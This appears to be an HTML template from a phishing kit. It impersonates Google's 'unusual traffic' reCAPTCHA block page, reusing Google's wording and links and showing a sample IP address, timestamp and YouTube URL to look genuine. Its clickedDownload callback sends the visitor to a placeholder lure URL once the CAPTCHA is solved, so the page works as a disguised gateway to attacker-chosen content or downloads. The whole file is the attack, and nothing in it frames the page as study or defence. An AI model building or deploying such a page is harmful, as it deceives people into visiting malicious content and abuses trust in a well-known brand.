<!DOCTYPE html>
<html>

<head>
    <meta http-equiv="content-type" content="text/html; charset=utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>reCAPTCHA Verification</title>
    <style>
        body {
            font-family: arial, sans-serif;
            background-color: #fff;
            color: #000;
            padding: 20px;
            font-size: 18px;
            overscroll-behavior: contain;
            word-wrap: normal;
            overflow-wrap: normal;
            white-space: normal;
        }

        .container {
            max-width: 415px;
        }

        .text-container {
            font-size: 13px;
            line-height: 1.4em;
            word-break: normal;
            overflow-wrap: anywhere;
        }
    </style>
    <script src="https://www.google.com/recaptcha/api.js" async defer></script>
    <script>
        function clickedDownload(response) {
            window.location.assign({ lure_url_js });
        }
    </script>
</head>

<body>
    <div class="container">
        <hr noshade size="1" style="color:#ccc; background-color:#ccc; margin-bottom: 1rem;">
        <noscript>
            <div style="font-size:13px;">
                In order to continue, please enable JavaScript on your web browser.
            </div>
        </noscript>
        <form id="captcha-form">
            <div id="recaptcha" class="g-recaptcha" data-sitekey="6LcitvIqAAAAAMc2oek8K4ORUpYl3J9d27ddDjLK"
                data-callback="clickedDownload">
            </div>
        </form>
        <hr noshade size="1" style="color:#ccc; background-color:#ccc; margin-top: 1rem;">
        <div class="text-container">
            <b>About this page</b><br><br>
            Our systems have detected unusual traffic from your computer network. This page checks to see if it's really
            you sending the requests, and not a robot.<br>
            <a href="#" onclick="document.getElementById('infoDiv').style.display='block';">Why did this
                happen?</a><br><br>
            <div id="infoDiv"
                style="display:none; background-color:#eee; padding:10px; margin:0 0 15px 0; line-height:1.4em;">
                This page appears when Google automatically detects requests coming from your computer network which
                appear to be in violation of the
                <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly after
                those requests stop.
                In the meantime, solving the above CAPTCHA will let you continue to use our services.<br><br>
                This traffic may have been sent by malicious software, a browser plug-in, or a script that sends
                automated requests.
                If you share your network connection, ask your administrator for help &mdash; a different computer using
                the same IP address may be responsible.
                <a href="//support.google.com/websearch/answer/86640">Learn more</a><br><br>
                Sometimes you may be asked to solve the CAPTCHA if you are using advanced terms that robots are known to
                use, or sending requests very quickly.
            </div>
            IP address: 172.245.24.170<br>
            Time: 2025-03-12T20:09:48Z<br>
            URL: <a href="https://www.youtube.com/watch?v=NtU5wY9ktE8"
                target="_blank">https://www.youtube.com/watch?v=NtU5wY9ktE8</a><br>
        </div>
    </div>
</body>

</html>